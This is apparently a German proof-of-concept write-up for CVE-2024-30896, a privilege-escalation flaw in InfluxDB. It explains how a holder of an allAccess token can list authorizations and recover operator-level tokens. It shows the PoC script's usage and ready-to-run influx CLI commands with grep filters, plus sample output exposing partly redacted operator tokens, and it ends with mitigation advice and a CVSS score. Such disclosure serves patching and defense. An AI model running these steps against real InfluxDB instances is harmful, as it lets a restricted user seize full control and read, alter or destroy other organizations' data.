
Proof-of-Concept-Exploit für CVE-2024-30896, eine Privilegieneskalations-Schwachstelle in InfluxDB, die es Inhabern von allAccess-Tokens ermöglicht, über die Auflistung von Autorisierungstokens Zugriff auf Operator-Ebene zu erlangen.
Ein Business-Logik-Fehler in influxdb ermöglicht es Benutzern, die ein gültiges allAccess-Token besitzen, ihre Privilegien auf Operator-Ebene auszuweiten, indem sie aktuelle Autorisierungs-Token auflisten.
Ein Angreifer könnte ein Benutzer sein, dem ein Administrator über ein allAccess-Token nur innerhalb seiner Organisation Zugriff gewährt hat. Die Berechtigungen dieses Benutzers ermöglichen die volle Kontrolle über die Organisation, verhindern jedoch weiterhin, dass er mit anderen Organisationen interagieren kann.
Diese Schwachstelle würde es einem Benutzer ermöglichen, uneingeschränkten Zugriff auf die influxdb-Instanz zu erlangen. Ein ähnlicher Zustand könnte Vertraulichkeit, Integrität und Verfügbarkeit von Daten vollständig gefährden, die Benutzern verschiedener Organisationen gehören. Da das Operator-Token über administrative Berechtigungen verfügt, könnten außerdem Verfügbarkeit und Integrität der gesamten influxdb-Instanz gefährdet sein.
Skriptverwendung
% python3 ./influxdbPrivescCVE_PoC.py -h
usage: influxdbPrivescCVE_PoC.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] [-vv [VVERBOSE]]
optional arguments:
-h, --help show this help message and exit
-t TOKEN, --token TOKEN
Custom or allAccess token to access influx DB instance
-e ENDPOINTURL, --endpointUrl ENDPOINTURL
Endpoint Url of influxdb instance (ex. "https://myInfluxdbInstance:8086/")
-v [VERBOSE], --verbose [VERBOSE]
Enable verbose logging - INFO
-vv [VVERBOSE], --vverbose [VVERBOSE]
Enable verbose logging - DEBUG
influx auth ls -t <allAccessToken> | grep write:/orgs aus. Dadurch werden alle aktuell aktiven Operator-Tokens auf der influxdb-Instanz aufgelistet.Beispiel
# Using an allAccess token
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}
0cc41c3b050e5000 U1OuqmFC{REDACTED}
admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations write:orgs/87d0746948a3b3f5/authorizations read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets read:orgs/87d0746948a3b3f5/dashboards write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents read:orgs/87d0746948a3b3f5/notificationRules write:orgs/87d0746948a3b3f5/notificationRules read:orgs/87d0746948a3b3f5/notificationEndpoints write:orgs/87d0746948a3b3f5/notificationEndpoints read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks read:orgs/87d0746948a3b3f5/annotations write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications write:orgs/87d0746948a3b3f5/replications]
# Listing all available tokens passing allAccess token and retrieving only operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs
0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}
admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs write:/orgs read:/sources write:/sources read:/tasks write:/tasks read:/telegrafs write:/telegrafs read:/users write:/users read:/variables write:/variables read:/scrapers write:/scrapers read:/secrets write:/secrets read:/labels write:/labels read:/views write:/views read:/documents write:/documents read:/notificationRules write:/notificationRules read:/notificationEndpoints write:/notificationEndpoints read:/checks write:/checks read:/dbrp write:/dbrp read:/notebooks write:/notebooks read:/annotations write:/annotations read:/remotes write:/remotes read:/replications write:/replications]
allAccess-Tokens verfügen standardmäßig über die Berechtigung, alle Autorisierungen aufzulisten, die in derselben Organisation definiert sind, ohne Einschränkungen basierend auf dem Typ (custom, allAccess, operator) -> read:orgs/87d0746948a3b3f5/authorizations.
Beim Ausführen erstellt influx setup die erste (Standard-)Organisation, in der automatisch ein Operator-Token gespeichert wird. Benutzern sollte nur Zugriff auf sekundär erstellte Organisationen gewährt werden. Es wird empfohlen, mehrere Organisationen zu erstellen und den Benutzern nur diejenigen zu übergeben, die kein Operator-Token enthalten.
CVSS Base Score: 9.1
CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H